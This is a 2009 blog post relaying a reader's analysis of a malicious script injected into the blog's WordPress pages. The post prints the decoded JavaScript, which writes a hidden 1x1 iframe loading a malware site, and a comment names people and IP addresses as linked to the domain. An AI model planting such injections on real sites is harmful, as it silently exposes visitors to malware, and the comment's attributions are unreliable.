OrlyTaitzEsq.com

TaitzReport.com

Defend Our Freedoms Foundation (DOFF)
29839 Santa Margarita Pkwy, Ste 100
Rancho Santa Margarita CA, 92688
Copyright 2014

Review of Politics, Economics, Constitution, Law and World Affairs by Attorney and Doctor Orly Taitz


If you love your country, please help me fight this creeping tyranny and corruption.
Donations no matter how small will help pay for airline and travel expenses.





The articles posted represent only the opinion of the writers and do not necessarily represent the opinion of Dr. Taitz, Esq., who has no means of checking the veracity of all the claims and allegations in the articles.
Mail donations to:
Defend Our Freedoms Foundation, c/o Dr. Orly Taitz
29839 Santa Margarita Pkwy, Ste 100
Rancho Santa Margarita, CA 92688.
Contact Dr. Taitz at
orly.taitz@gmail.com.
In case of emergency, call 949-683-5411.

When the people fear their government, there is tyranny.
When the government fears the people, there is liberty.

-- Thomas Jefferson

During times of universal deceit, telling the truth
becomes a revolutionary act.
 -- George Orwell

First they ignore you, then they ridicule you, then they
fight you, then you win.
 -- Mahatma Gandhi


Please, contact wordpress, demand that they clean up the template and secure the site, I am using their platform. Here’s what I got:

Posted on | August 24, 2009 | 3 Comments

I decrypted what that new script they put at the end of the page. It is another link to malware. Looking at the code I saw they were using standard escape codes. So by , “unescaping” it, the text becomes clear.
This is what it translates to : ( I left out the script language= Javacript so that it doesn’t execute in your email:

document.wr’+’it’+’e(<iframe wid’+’th=1 height=1’+’ border=0 fr’+’ameb’+’order=’+’0 src=’https://spywa‘+’re-security.cn/cyber/in.cgi?4‘></

iframe>))</script>

As you can see, it sends the person to the site spyware-security.cn.. This is the site that is flagged as spreading malware. I think the script was just changed because the scanners had caught on to the signature of the last one.

So either someone has access to your blog and is able to change the coding ( a regular user setting up the blog cannot do that since they use templates provided by WorldPress ), or WorldPress has been hacked and it is on their template ( which means that it is not just your site that has this ). Normally I would suggest you cjhange templates, but you said because of the Berg suit nothing could be changed.
I suggest you contact Worldpress about it.

Comments

3 Responses to “Please, contact wordpress, demand that they clean up the template and secure the site, I am using their platform. Here’s what I got:”

  1. Jacob
    August 24th, 2009 @ 3:28 pm

    The word id wordpress, not worldpress.

  2. Michael Short
    August 25th, 2009 @ 8:40 pm

    At iptools.com the domain name security-spyware.cn is registered in the name of McDougall Heather. The IP addresses 91.212.198.52 and 69.56.222.10 that are related to this domain name establish that the server is in Guatemala. The owner of the IP addresses appears to be in Russia and is Nevedomsky AA